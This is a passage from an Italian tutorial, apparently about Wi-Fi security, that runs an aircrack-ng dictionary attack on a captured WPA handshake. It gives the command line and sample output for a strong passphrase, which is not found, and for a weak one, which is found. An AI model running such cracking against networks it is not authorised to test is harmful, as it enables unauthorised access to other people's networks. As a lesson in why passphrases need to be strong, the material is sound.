Come abbiamo detto, cerchiamo di eseguire un attacco brute force contro il traffico catturato:
aircrack-ng -w /tmp/password.lst -b 00:49:13:A3:CE:09 psk*.cap
Con una password forte ovviamente non v'è speranza: questa non è contenuta in nessun dizionario (nell'esempio ho usato password.lst, file fornito col programma, da me posto poi in /tmp) né è pensabile un attacco di forza bruta in senso stretto, il quale potrebbe impiegare quanto l'Universo ha impiegato a divenire ciò che è oggi (né noi abbiamo così tanto tempo da aspettare seduti davanti ad un monitor).
Ed infatti:
Aircrack-ng 1.0 beta2 [00:00:01] 230 keys tested (146.93 k/s) Current passphrase: zeppelin Master Key : 97 E9 13 3C E5 5E B8 CD 66 28 6A 53 E8 0E 9D E0 62 FA BD 9A 0A D2 D6 30 E0 44 52 8A E1 0B 55 47 Transcient Key : 53 FC 62 5F F2 3C 5C 95 7E 46 EF 2F 9F 45 DC 4B 12 35 7D EE 24 46 E7 47 97 6F F6 BA 0A 9B 84 8A 76 EE 7C 10 90 4A 52 13 FC 38 88 D1 3D 77 BE 8D 29 1E 09 E6 B0 B4 D1 B1 CA 71 87 AE 2C E5 B0 59 EAPOL HMAC : DF 06 CB 79 45 7A 29 C1 64 DA 57 65 15 73 89 6A Passphrase not in dictionnary
Niente da fare.
Se, invece, la password fosse stata debole, avremmo potuto ottenere un output del tipo:
Aircrack-ng 1.0 beta2 [00:00:00] 38 keys tested (138.83 k/s) KEY FOUND! [ volley ] Master Key : 43 57 43 48 06 A0 0C 75 74 41 44 17 A4 6C 35 C0 8B 04 C8 A9 DB 3B 11 81 A0 BC 07 24 E3 63 92 BE Transcient Key : D2 48 A4 EF 1C A4 18 2B E2 9B 4D 0C D5 D1 4B 3A 6E AB 63 21 8F 59 2E 73 F8 2B 7D E1 D5 35 F8 72 FB 2C D8 27 D3 97 8D 13 41 9D F8 91 4A A5 C6 6B F5 BC C6 DD 9A 3D 50 7B 8B F9 70 19 F5 CF 60 9A EAPOL HMAC : C1 BE 87 6F AA 09 98 D6 16 AB 89 F1 34 FC 08 4E
Con tutta la felicità dell'attaccante, il quale avrebbe raccontato per gli anni a venire la sua maestria agli amici - che inevitabilmente avrebbero scambiato la sua gioia palesata, data una siffatta impresa, per ben altro.